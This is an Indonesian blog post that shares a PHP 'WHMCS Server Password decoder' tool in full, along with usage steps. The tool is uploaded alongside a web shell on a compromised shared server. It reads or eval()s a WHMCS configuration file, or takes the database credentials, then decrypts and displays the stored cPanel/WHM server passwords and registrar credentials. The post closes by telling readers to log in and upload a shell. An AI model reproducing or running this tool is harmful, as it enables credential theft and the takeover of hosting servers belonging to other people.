Wednesday 5 September 2012

tools pencari user pass cpanel WHM

Unknown    No comments

assalamualikum all...
maaf newbie mau berbagi tools untuk mencari user pass cpanel WHM..
hehehehe...

oke langsung aja...
Quote:harus dapet config dr whmnya dulu

kl ane dapet confignya dr jumppingan yang sau server ma target ane...
hehehe....

ini tools nya PHP...
jadi tinggal di upload aja bareng shell nya...
ni source nya...


Spoiler: hide
Quote:<?php

###########################################
# WHMCS Server Password decoder #
# Coded By RAB3OUN #
# v.b-4@hotmail.com #
#Note : I'm Proud to be ~~TUNISIAN~~ #
###########################################



function decrypt ($string,$cc_encryption_hash)
{

$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
$hash_key = _hash ($key);
$hash_length = strlen ($hash_key);
$string = base64_decode ($string);
$tmp_iv = substr ($string, 0, $hash_length);
$string = substr ($string, $hash_length, strlen ($string) - $hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length)
{
$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
++$c;
}

$key = $iv;
$c = 0;
while ($c < strlen ($string))
{
if (($c != 0 AND $c % $hash_length == 0))
{
$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
}

$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
++$c;
}

return $out;
}


function _hash ($string)
{
if (function_exists ('sha1'))
{
$hash = sha1 ($string);
}
else
{
$hash = md5 ($string);
}

$out = '';
$c = 0;
while ($c < strlen ($hash))
{
$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
$c += 2;
}

return $out;
}

if($_POST['form_action'] == 1 )
{
//include($file);

$file=($_POST['file']);
$text=file_get_contents($file);

$text= str_replace("<?php", "", $text);
$text= str_replace("<?", "", $text);
$text= str_replace("?>", "", $text);

eval($text);

$link=mysql_connect($db_host,$db_username,$db_pass word) ;
mysql_select_db($db_name,$link) ;

$query = mysql_query("SELECT * FROM tblservers");

while($v = mysql_fetch_array($query)) {

$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];

echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>Username</td><td>$username</td></tr>");
echo("<tr><td>Password</td><td>$password</td></tr>");


echo "</table><br><br></center>";

}

$link=mysql_connect($db_host,$db_username,$db_pass word) ;
mysql_select_db($db_name,$link) ;

$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table border='1'>");
echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {

$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");





}
echo "</table><br><br></center>";
}



if($_POST['form_action'] == 2 )
{
//include($file);

$db_host=($_POST['db_host']);
$db_username=($_POST['db_username']);
$db_password=($_POST['db_password']);
$db_name=($_POST['db_name']);
$cc_encryption_hash=($_POST['cc_encryption_hash']);




$link=mysql_connect($db_host,$db_username,$db_pass word) ;
mysql_select_db($db_name,$link) ;

$query = mysql_query("SELECT * FROM tblservers");

while($v = mysql_fetch_array($query)) {

$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];

echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>Username</td><td>$username</td></tr>");
echo("<tr><td>Password</td><td>$password</td></tr>");


echo "</table><br><br></center>";

}


$link=mysql_connect($db_host,$db_username,$db_pass word) ;
mysql_select_db($db_name,$link) ;

$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table border='1'>");
echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {

$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");





}
echo "</table><br><br></center>";
}




?><body bgcolor="#000000">
<style>

BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive; color: white;}
textarea{background-color:#191919;color:red;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1px solid #666666;}
input{FONT-WEIGHT:normal;background-color: #191919;font-size: 13px;font-weight:bold;color: red; font-family: Tahoma; border: 1px solid #666666;height:17}
</style>
<center>
<font color="#FFFF6FF" size='+3'>[ ~~ WHMCS Server Password decoder ~~ ]</font><br><br>
<font color="#0066FF" size='+2'>Symlink to configuration.php of WHMCS</font><br>
</center>
<FORM action="" method="post">
<input type="hidden" name="form_action" value="1">
<br>
<input type="text" size="30" name="file" value="">
<br>
<INPUT class=submit type="submit" value="Submit" name="Submit">
</FORM>
<hr>

<br>
<center>
<font color="#0066FF" size='+2'>DB configuration of WHMCS</font><br>
</center>
<FORM action="" method="post">
<input type="hidden" name="form_action" value="2">
<br>
<table border=1>

<tr><td>db_host </td><td><input type="text" size="30" name="db_host" value="localhost"></td></tr>
<tr><td>db_username </td><td><input type="text" size="30" name="db_username" value=""></td></tr>
<tr><td>db_password</td><td><input type="text" size="30" name="db_password" value=""></td></tr>
<tr><td>db_name</td><td><input type="text" size="30" name="db_name" value=""><td></tr>
<tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>

</table>
<br>
<INPUT class=submit type="submit" value="Submit" name="Submit">
</FORM>
<hr>
<center>
<font color="#0066FF" size='+2'>Password decoder</font><br>
<?
if($_POST['form_action'] == 3 )
{



$password=($_POST['password']);

$cc_encryption_hash=($_POST['cc_encryption_hash']);


$password = decrypt ($password, $cc_encryption_hash);

echo("Password is ".$password);

}
?>
</center>
<FORM action="" method="post">
<input type="hidden" name="form_action" value="3">
<br>
<table border=1>

<tr><td>Password</td><td><input type="text" size="30" name="password" value=""></td></tr>
<tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>

</table>
<br>
<INPUT class=submit type="submit" value="Submit" name="Submit">
</FORM>
<hr>


<center> <font color="#FFFF6FF" size='+1'> Coded By RAB3OUN v.b-4@hotmail.com </font><br><br> <center>
untuk penampakanya :
Spoiler: hide
[Image: wh.png]
untuk penggunaanya...
kl dah dapet config WHM nya tinggal di taruh aja aja di kaya ini...
Spoiler: hide
[Image: peng.png]
contoh config WHM yg ane dapet...
Spoiler: hide
Quote:<?php
$license = 'Owned-_______________';
$db_host = 'localhost';
$db_username = '***********';
$db_password = '*************';
$db_name = '**********';
$cc_encryption_hash = '************************************************';
$templates_compiledir = 'templates_c/';
$mysql_charset = 'utf8';
?>
kl dah di taruh semua tinggal di submit deh...
ntar keluar tu user ma pass cpanel whmnya...
Spoiler: hide
[Image: Screenshot-8.png]
udah deh..
tinggal buka tu cpanel whm nya dan upload tu shell nya...

*********selesai********

Socializer Widget By Blogger
SOCIALIZE IT →
FOLLOW US →
SHARE IT →

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)
Flag Counter

 

Copyright © 2013 C4.